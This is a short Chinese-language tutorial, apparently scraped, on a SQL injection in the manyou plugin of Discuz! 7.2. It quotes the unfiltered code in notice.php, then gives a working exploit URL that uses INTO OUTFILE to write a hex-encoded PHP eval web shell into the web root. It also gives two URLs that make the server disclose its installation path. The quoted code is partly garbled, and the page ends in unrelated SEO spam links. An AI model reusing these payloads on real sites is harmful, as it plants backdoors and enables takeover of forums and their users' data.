discuz! 7.2 注入漏洞分析与利用.docVIP

Discuz! 7.2 注入漏洞分析与利用 在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新插件中，没有对传入的参数进行检查，在GPC为off的情况下，导致注入漏洞的产生。 漏洞分析：文件./manyou/sources/notice.php 相关代码： if($option == del) {$appid = intval($_GET[appid]);$db-query(DELETE FROM {$tablepre}myinvite WHERE appid=$appid AND touid=$discuz_uid);showmessage(manyou:done, userapp.php?script=noticeaction=invite);} elseif($option == deluserapp) {$hash = trim($_GET[hash]);????//此处并没有进行过滤，直接导致注入的产生if($action == invite) {????$query = $db-query(SELECT * FROM {$tablepre}myinvite WHERE hash=$hash AND touid=$discuz_uid);if($value = $db-fetch_array($query)) {$db-query(DELETE FROM {$tablepre}myinvite WHERE hash=$hash AND touid=$discuz_uid);showmessage(manyou:done, userapp.php?script=noticeaction=invite);} else {showmessage(manyou:noperm);}} else {$db-query(DELETE FROM {$tablepre}mynotice WHERE id=$hash AND uid=$discuz_uid);showmessage(manyou:done, userapp.php?script=notice);}} 很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式，但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。 /userapp.php?script=noticeview=alloption=deluserappaction=invitehash= union select NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E,NULL,NULL,NULL,NULL into outfile C:/inetpub/wwwroot/shell.php%23 0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是 的十六进制表示。 但想直接into outfile的话，我们还得有web的物理路径，这在php的情况下并不难得到。 /manyou/admincp.php?my_suffix=%0A%0DTOBY57 /manyou/userapp.php?%0D%0A=TOBY57 这样就万事具备，只差outfile了。 济宁SEO推荐文章：? \o Permanent Link to 济宁SEO教你通过网站优化赚钱 济宁SEO教你通过网站优化赚钱???????????????????????? \o Permanent Link to 什么是linkwheel？济宁SEO带你认识linkwheel 什么是linkwheel？济宁SEO带你认识linkwheel \o Permanent Link to 济宁SEO谷歌排名第一位 济宁SEO谷歌排名第一位????????????????????????????? \o Permanent Link to 济宁SEO分享一篇不错的文章，不看后悔！ 济宁SEO分享一篇不错的文章，不看后悔！ \o Permanent Link to SEO知识摸底检验 SEO知识摸底检验?????????????????????????????????? \o Permanent Link to 网站优化常用的SEO推广技巧 网站优化常用的SEO推广技巧 \o Permanent Link to 什么是静态 URL 或动态 URL？ 什么是静态 URL 或动态 URL？??????????????????????? \o Permanent Link